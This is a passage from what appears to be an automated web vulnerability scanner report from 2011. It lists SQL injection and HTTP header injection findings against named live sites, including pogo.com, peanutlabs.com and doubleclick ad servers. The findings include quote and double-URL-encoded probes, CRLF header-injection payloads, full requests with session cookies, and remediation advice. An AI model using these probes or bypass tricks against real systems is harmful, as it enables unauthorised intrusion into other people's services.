User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0'; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:53 GMT
Server: Apache-Coyote/1.1
Content-Length: 25666


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...

Request 2

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0''; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fprize%2Fprize.do%3FpageSection%3Dfooter_prize
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:56:54 GMT
Server: Apache-Coyote/1.1


1.25. http://www.pogo.com/prize/prize.do [op600clubpogoliid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /prize/prize.do

Issue detail

The op600clubpogoliid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op600clubpogoliid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e'; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:03 GMT
Server: Apache-Coyote/1.1
Content-Length: 25548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...

Request 2

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e''; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fprize%2Fprize.do%3FpageSection%3Dfooter_prize
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:56:03 GMT
Server: Apache-Coyote/1.1


1.26. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/ [PHPSESSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www1.peanutlabs.com
Path:   /peanut-labs-acquired-by-online-research-company-e-rewards-2/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 07:24:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=568>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29570


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs Acquired By E-Rewards
...[SNIP]...

1.27. http://www1.peanutlabs.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www1.peanutlabs.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /wp-content/plugins/contact-form-7%2527/scripts.js HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7%2527%2527/scripts.js HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 07:24:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40811


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...

1.28. http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www1.peanutlabs.com
Path:   /xmlrpc.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xmlrpc.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /xmlrpc.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 07:24:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Content-Length: 42
Connection: close
Content-Type: text/plain

XML-RPC server accepts POST requests only.

2. HTTP header injection
There are 29 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 586bb%0d%0a9799c72b680 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /586bb%0d%0a9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/586bb
9799c72b680
/N6271.148484.FRONTLINEDIRECTINC./B4796131.29:
Date: Sun, 09 Jan 2011 02:03:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/downloads.pogo/category [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3913f%0d%0a3c0a349169b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3913f%0d%0a3c0a349169b/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3913f
3c0a349169b
/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:03:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e05c%0d%0a76a123a846 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e05c%0d%0a76a123a846/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e05c
76a123a846
/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632:
Date: Sun, 09 Jan 2011 02:03:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a67f%0d%0a245da988542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a67f%0d%0a245da988542/scrabble.pogo/load HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a67f
245da988542
/scrabble.pogo/load:
Date: Sun, 09 Jan 2011 02:03:14 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c29f%0d%0a119f9246290 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c29f%0d%0a119f9246290/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c29f
119f9246290
/scrabble.pogo/room%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D326364:
Date: Sun, 09 Jan 2011 02:03:14 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5621.148484.0233710364621/B4682144

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f927%0d%0a372c17095f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f927%0d%0a372c17095f9/N5621.148484.0233710364621/B4682144 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f927
372c17095f9
/N5621.148484.0233710364621/B4682144:
Date: Sun, 09 Jan 2011 02:03:16 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6457.4298.ADVERTISING.COM/B4840137.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2379a%0d%0acb4e6408377 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2379a%0d%0acb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2379a
cb4e6408377
/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http: //r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn%3D64
Date: Sun, 09 Jan 2011 02:03:04 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/downloads.pogo/category [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31153%0d%0aafba1dd703b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31153%0d%0aafba1dd703b/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31153
afba1dd703b
/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:02:58 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1329b%0d%0a901e1fb73e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

